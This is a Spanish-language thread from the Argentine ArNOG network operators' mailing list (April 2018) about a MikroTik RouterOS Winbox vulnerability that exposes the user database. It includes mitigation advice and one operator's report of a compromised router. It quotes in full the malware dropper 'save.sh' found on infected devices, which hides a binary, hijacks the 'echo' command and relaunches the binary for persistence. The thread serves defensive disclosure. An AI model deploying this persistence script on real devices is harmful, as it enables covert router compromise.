[Lista ArNOG] Alerta seguridad Mikrotik

Jose Luis Gaspoz gaspozj en is.com.ar
Mar Abr 24 08:35:43 ART 2018 

Nosotros fuimos víctimas de esto hace unos 10 dias atrás (eso quiere decir que puede hacer bastante tiempo que está) en un CCR 1036 que no estaba lo suficientemente cerrado al exterior y fué exactamente de esa manera.... lo sospechoso es el tema que lo primero que hace (que aparece en el log) es “ip services changed by .....” y tiene que ser un script que lo corre porque el log tiene el mismo timestamp que el logueo vía Winbox.

No encontramos ningún cambio aparente en “ip services” (revisamos todo lo que se puede ver en un CCR).

Era de un cliente, por lo que se lo actualizó (SO y firmware), se cambiaron las pass y se cerro el equipo para cualquier servicio exterior y “en apariencia” esta funcionando normalmente (no tiene mucha exigencia por ser de un cliente).

OJO, no hay nada sospechoso, así que puede haber muchos infectados porque solo aparece eso en el log hasta que se sobreescribe..... salvo que esten logueando a un syslog.

Saludos 

Ing. Jose Luis Gaspoz
Internet Services S.A.
Tel: 0342-4565118
Cel: 342-5008523

From: Carriers 
Sent: Tuesday, April 24, 2018 7:06 AM
To: lista en arnog.com.ar ; lista en arnog.com.ar 
Subject: Re: [Lista ArNOG] Alerta seguridad Mikrotik

Estimados  ojo  con esa versión  yo tube un par de problemas  se me iban los ping altisimos . al parecer hay  cambios en el enrutamiento


En 24 de abril de 2018, en 06:46, Juan Pablo Orsi <juanpablo en internetlocal.com.ar> escribió: 
  En el día de hoy MikroTik ha publicado un alerta de seguridad sobre una vulnerabilidad en el RouterOS que afecta a todas las versiones desde la v6.29.

  Según el alerta, indica que la vulnerabilidad ha sido descubierta por ellos mismos y que recomiendan actualizar ASAP (lo mas pronto posible).

    La vulnerabilidad permite a una “herramienta especial” conectar al puerto del Winbox y poder solicitar la base de datos de los usuarios del sistema.

  Para tomar una medida al respecto se recomienda:

    a.. Actualizar a la v6.42.1 y v6.43rc4 *Con precaución(leer mas adelante) 
    b.. Cerrar el puerto del Winbox para el acceso publicomediante un address list y el firewall en el chain input 
    c.. Limitar el rango de IP permitidos en ip > service > winbox a las redes locales unicamente. 
    d.. Cambiar las contraseñas de los usuarios.
  Es importante tener en cuentaque en las recientes versiones del RouterOS existe un nuevo esquema en el manejo del bridge, porque lo hay que tener ciertas precauciones al actualizar debido a que se han dado casos de actualizaciones fallidas en configuraciones que tienen bridge y utilizan el chip switch.

  En caso de equipos que se encuentren en  producción y no es posible actualizar rápidamente el sistema operativo, es mandatorio que se cierre el acceso del winbox y cambiar las contraseñas de los usuarios.

  Por el momento no es posible conocer o detectar que el sistema ha sido vulnerado, por lo que también se recomienda aplicar el punto anterior.

  https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255


  ACTUALIZACION:
  Algunos usuarios están reportan que detectan dos archivos dentro de files con el nombre de dnstest con contenido binario y save.sh con el siguiente contenido:

#!/bin/ash
case "$PATH" in
*/usr/local/bin*)
# old versions
dest="/usr/local/bin/"
;;
*)
dest="/flash/bin/"
if [ ! -d "/flash/" ]; then
exit 1
fi
;;
esac 

if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi

mkdir -p $dest

export PATH=$PATH:$dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest

echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test

echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
chmod +x $dest/echo
/flash/rw/pckg/dnstest
rm save.sh
El intento tiene el siguiente comportamiento:

  Como se observa en la siguiente captura, el primer acceso es un intento fallido del winbox, por lo que se presume que tiene el acceso a la DB de usuarios. Luego el acceso es con el usuario con permisos full.



------------------------------------------------------------------------------Lista mailing listLista en arnog.com.arhttp://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista
     Libre de virus. www.avg.com  



--------------------------------------------------------------------------------
_______________________________________________
Lista mailing list
Lista en arnog.com.ar
http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista
------------ próxima parte ------------
Se ha borrado un adjunto en formato HTML...
URL: <http://mailmancabase.interdotnet.com.ar/pipermail/lista/attachments/20180424/9173b8ef/attachment-0001.html>

Más información sobre la lista de distribución Lista